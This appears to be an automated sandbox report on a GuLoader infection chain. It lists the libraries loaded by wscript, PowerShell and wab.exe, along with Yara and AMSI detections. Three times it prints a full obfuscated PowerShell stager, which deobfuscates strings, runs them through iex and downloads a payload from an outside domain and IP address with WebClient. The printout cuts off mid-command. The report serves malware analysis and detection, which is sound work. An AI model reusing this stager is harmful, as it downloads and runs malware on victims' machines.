Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbC source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: ShellExecute("PowerShell", ""cls;write 'Byggeforetagender Jenda Non", "", "", "0");

Yara detected GuLoader

Source: Yara match	File source: 00000004.00000002.2307801127.000000000A152000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2959075340.0000000005192000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tetricalness)$global:Retterstedets = [System.Text.Encoding]::ASCII.GetString($Fusobacteria)$global:Makuleret=$Retterstedets.substring($Morderskers,$Horehuset)<#dissheathe Feuillage E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Protogelatose $Kernevaabnene $nonfusibility), (Fjernendes5 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Baandtlleres = [AppDomain]::CurrentDomain.GetAss
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Kasseapparatet)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Naboejendommene, $false).DefineType($Cambr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tetricalness)$global:Retterstedets = [System.Text.Encoding]::ASCII.GetString($Fusobacteria)$global:Makuleret=$Retterstedets.substring($Morderskers,$Horehuset)<#dissheathe Feuillage E

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely 